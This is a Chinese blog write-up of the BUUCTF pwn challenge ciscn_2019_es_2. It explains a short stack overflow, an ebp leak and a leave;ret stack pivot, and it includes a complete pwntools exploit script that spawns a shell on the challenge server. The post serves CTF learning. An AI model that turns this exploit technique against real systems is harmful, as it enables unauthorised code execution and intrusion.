[PWN] BUUCTF ciscn_2019_es_2

最新推荐文章于 2025-04-06 16:32:13 发布
最新推荐文章于 2025-04-06 16:32:13 发布
阅读量1.5k 收藏 17
点赞数 13
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_45743302/article/details/118066603
版权

[PWN] BUUCTF ciscn_2019_es_2

解题分析

按照惯例checksec一下,开了NX与RELRO

在这里插入图片描述
运行程序,查看逻辑,两次input,并且回显Hello,input
在这里插入图片描述
32位IDA打开,查看关键函数vul(),发现两次read往s里写内容,read可写0x30个字节,但s的缓冲区只有0x28个字节,所以这里存在着栈溢出,若有backdoor直接获得flag的话,可直接构造

payload=0x28*‘a’+ebp+backdoor

在这里插入图片描述

shift+12查看特殊字符,发现”echo flag“

在这里插入图片描述

根据"echo flag"找到函数hack,这里直接返回system(“echo flag”),可惜system里面的参数不是/bin/sh,所以不能直接利用
则需要修改system里面的参数,问题来了,read只能读取0x30个字节,若想直接修改system里的参数的话, 可利用栈空间不够,所以这里考虑到了栈迁移,同时迁移栈空间足够后需要知道/bin/sh的地址,这个可以通过read来输入/bin/sh,并且泄露一个地址,计算偏移量来找出输入/bin/sh的地址
在这里插入图片描述
记system地址:08048400
在这里插入图片描述

漏洞利用

1.存在栈溢出,但可利用栈空间不够,采用栈迁移

栈溢出长度不足来直接 ROP,把栈迁移到别的地方来构造新的ROP链,一般利用leave_ret来进行栈迁移

leave
//move esp ebp  将ebp指向的地址给esp
//pop ebp  将esp指向的地址存放的值赋值给ebp
ret
//pop eip  将esp指向的地址存放的值赋值给eip

2.泄露某一个地址来计算输入/bin/sh的地址
3.构造新的ROP

payload解析

#coding=utf-8
#!/usr/bin/env python   
from pwn import *    #导入pwntools中的pwn包的所有内容
context.terminal = ['terminator','-x','sh','-c']
context.log_level='debug'
p=remote('node3.buuoj.cn',27717)
# p=process("./ciscn_2019_es_2")
# elf = ELF('./ciscn_2019_es_2')
sys_addr=0x08048400
leave_ret=0x080484b8
p.recvuntil("Welcome, my friend. What's your name?\n")
payload1= 0x20*"a"+"b"*0x8
p.send(payload1)
p.recvuntil("b"*0x8)
ebp_addr=u32(p.recv(4))

log.success('ebp==>'+hex(ebp_addr))

payload2 = ("aaaa"+p32(sys_addr)+'aaaa'+p32(ebp_addr-0x28)+'/bin/sh').ljust(0x28,'\x00')+p32(ebp_addr-0x38) + p32(leave_ret)
p.send(payload2)
p.interactive()

1.第一次read泄露ebp地址

payload1= 0x20*"a"+"b"*0x8
p.send(payload1)
p.recvuntil("b"*0x8)
ebp_addr=u32(p.recv(4))

2.第二次read利用leave_ret劫持地址
这里劫持到一开始s读入的地址即ebp-0x38

#p32(sys_addr)+‘aaaa’+p32(bin_sh)

payload2 = (“aaaa”+ p32(sys_addr)+‘aaaa’+ p32(ebp_addr-0x28)+’/bin/sh’).ljust(0x28,’\x00’)
payload2 += p32(ebp_addr-0x38) 输入的起始地址,劫持地址
payload2 += p32(leave_ret)

aaaa是第二次leave_ret 时 pop ebp中赋给ebp的值 ,之后pop eip 即ret=sys_addr,"aaaa"是执行sys后的返回地址,ebp_addr-0x28是/bin/sh地址,这些偏移通过gdb调试得出

程序执行过程图

输入数据流初始状态
在这里插入图片描述

第一次leave_ret move esp ebp

在这里插入图片描述
第一次leave_ret pop ebp:

在这里插入图片描述

esp=esp+4指向leave_ret

第一次leave_ret pop eip:
在这里插入图片描述

执行leave_ret 准备第二次leave

第二次leave_ret move esp ebp
在这里插入图片描述

第二次leave_ret pop ebp
在这里插入图片描述

第二次leave_ret pop eip

在这里插入图片描述
在这里插入图片描述
flag get!

参考:

https://blog.youkuaiyun.com/qq_40410406/article/details/109616205

BUUCTF迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1137
1.checksec+运行获取基本信息 32位+NX堆不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
[BUUCTF]-PWN:ciscn_2019_es_7解析(系统调用execve,srop)
2301_79326813的博客
01-30 539
这道题好像和buu的ciscn_2019_s_3是一模一样的看保护64位,没开canary和pie看ida题目还有能往rax传递0x3B和0xf的函数,这就提示我们可以用系统调用来getshell。
[BUUCTF]PWN——ciscn_2019_es_2
mcmuyanga的博客
10-27 2955
ciscn_2019_es_2 附件 步骤: 例行检查,32位程序,开启了nx保护 32位ida载入,shif+f12查看程序里的字符串,这边的“echo flag” 是个迷惑性的字符串,它只是输出了flag这4个字符,但是程序里有system函数,到时候这个函数可以直接拿来使用 system_addr=0x80048400 main函数 程序主体在vul函数里 读入0x30字节数据给s,s大小是0x28,只能溢出0x8字节,覆盖到ret,没法构造太长的rop,但是这边可以给s写入
迁移ciscn_2019_es_2
最新发布
rjc20051110的博客
04-06 695
这里的思路就是通过第一次输入泄露ebp所指向的ebp’的地址 然后搞到ebp和ebp’的偏移量 利用第二次read布置空间 然后通过覆盖ebp’迁移到布置好的空间。为什么要泄露ebp’?既然我们可以覆盖ebp所指向的ebp’ 直接将其改写成为s的起始位置不就好了 这么麻烦干嘛?然后我们要搞清楚ebp和ebp’的偏移 因为ebp和s的偏移已知 只要知道ebp’和ebp的偏移就可以知道 ebp’和s的偏移。既然每次的都不一样 就没法通过一个固定的值来覆盖了 就需要泄露此次的ebp’的地址以及偏移量了。
buuctf ciscn_2019_es_2
carol2358的博客
04-24 725
通过这道题总算学会用gdb来调试stack了 一道迁移的题目,printf函数可以泄露出bp的地址 有system函数,但是没有/bin/sh,所以我采用了往stack里写入binsh,然后通过泄露出来的bp算出偏移来指向binsh的位置,从而getshell 调试的时候看泄露出的地址和aaaa的偏移,和binsh的偏移,上的地址是\xff开头 exp: from pwn import ...
PWN · 迁移】[BUUCTF]ciscn_2019_es_2
Mr_Fmnwon的博客
07-30 697
当前溢出可用空间比较少时(极端情况下仅能覆写ebp和ret),可以通过迁移的方式,扩大shellcode的容纳空间,其核心是将esp移动到一段shellocode开头。而esp总是由ebp赋值,所以总是通过两次leave;ret的方式修改esp到固定位置。一、代码审计有两次读入操作。read进的内容超过字符串的长度,存在溢出漏洞。然而计算溢出长度,发现只有8字节,即刚好可以覆写ebp和ret。发现system的函数(意味着plt对应的表项存在),然而这个hack函数并不能给出flag。
BUUCTFciscn_2019_es_2
m0_51251108的博客
12-28 332
BUUCTFciscn_2019_es_2 看下程序 有两处read可以溢出,但只能溢出刚好盖到ebp和ret 由于memset只清了0x20,所以可以泄露出ebp 有system函数,但参数不对 思路:运用迁移迁移到我们写入的前面的部分,写rop链,就可以开shell了 由于需要跳转到我们写入的前面的部分需要知道它的地址,地址=ebp地址-偏移。 用gdb-peda调试,断点设在vul函数,一步步跟进,可以输入aaaa 然后searchmem aaaa stack 来查看状态 (这图可能
[BUUCTF]-PWN:ciscn_2019_es_1解析(tcachebin duf)
2301_79326813的博客
02-17 390
查看保护再查看ida大致为alloc创建堆块,free释放堆块,show输出堆块内容但是要注意一点free没有清空堆块指针。
BUUCTF-PWN刷题记录-5(Tcache)
weixin_44145820的博客
04-13 1583
目录ciscn_2019_final_3[V&N2020 公开赛]easyTHeap ciscn_2019_final_3 只有添加和删除两个功能 限制了申请的大小,最大为0x78,意味着chunk最大为0x80,添加完可以泄露堆上的地址 free之后没有置空,可以double free 题目分析差不多就这样,下面是漏洞利用: 先申请一个大小为0x78的heap[0],记录下返回地...
BUUCTF-PWN刷题记录-12
weixin_44145820的博客
04-23 833
ciscn_2019_sw_1 一道思路比较独特的格式化字符串漏洞题目 main函数中只有一次利用漏洞的机会 有system的got表项 一个可行思路是把printf的GOT改为system@plt,然后输入/bin/sh,但是考虑到只有一次机会就比较困难 所以我们需要一个能让main多次执行的办法 这时我们只要把main的地址填入finit_array就能无限循环main函数了 简单介绍一...
迁移】[BUUCTF]ciscn_2019_es_2
s_hiy_iyi的博客
04-01 449
0x30字节数据给s,s大小是0x28,只能溢出0x8字节,刚好覆写ebp和ret。ret的劫持去到参数s的,让它去执行我们布置在上的system(‘/bin/sh’)来获取shell。第二次直接往上写入后门 函数 system(‘/bin/sh’),之后利用leave;第一次输入来泄露程序里的ebp地址,知道了ebp的地址就能够推算出参数s在上的地址。如果我们输入的内容正好把ebp前面的区域完全覆盖,这样就没法在末尾补上’\0‘,可以将rop链写到上,再将劫持到我们写的地方就可以了。
ciscn_2019_es_2BUUCTF
qq_41696518的博客
09-02 1110
与往常溢出不同的是,该溢出仅仅只能溢出8(0x30-0x28)字节的数据,恰好就是覆盖ebp和ret地址数据,并且存在两处溢出漏洞。因此可以用read函数将system(“/bin/sh”)读到当前中,并返回让其执行该函数即可。这里有两个问题,1.system(“/bin/sh”)存储地址如何得知 2. 如何返回该system地址执行函数。
ciscn_2019_es_2
、moddemod
06-23 907
简单分析:两次read都往同一个地方填数据(s变量的位置),可输入0x30大小,s离ebp距离0x28,可通过printf泄露压入的上一个帧的ebp,之后通过第二次read构造leave控制esp from pwn import * def debug_pause(): log.info(proc.pidof(p)) pause() context(log_level='debug') proc_name = './ciscn_2019_es_2' p = process(proc_name.
BUUCTF ciscn_2019_es_2
红叶的博客
11-02 421
迁移
ciscn_2019_pwn挑战赛:破解五道经典题目解析
资源摘要信息:"ciscn-2019-pwn包含五个不同难度级别的pwn挑战题目,分别为baby_pwn、bms、daily、Double和your_pwn。这些题目要求参赛者具备扎实的二进制漏洞挖掘和利用能力,以及对操作系统底层安全的深刻理解。接...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值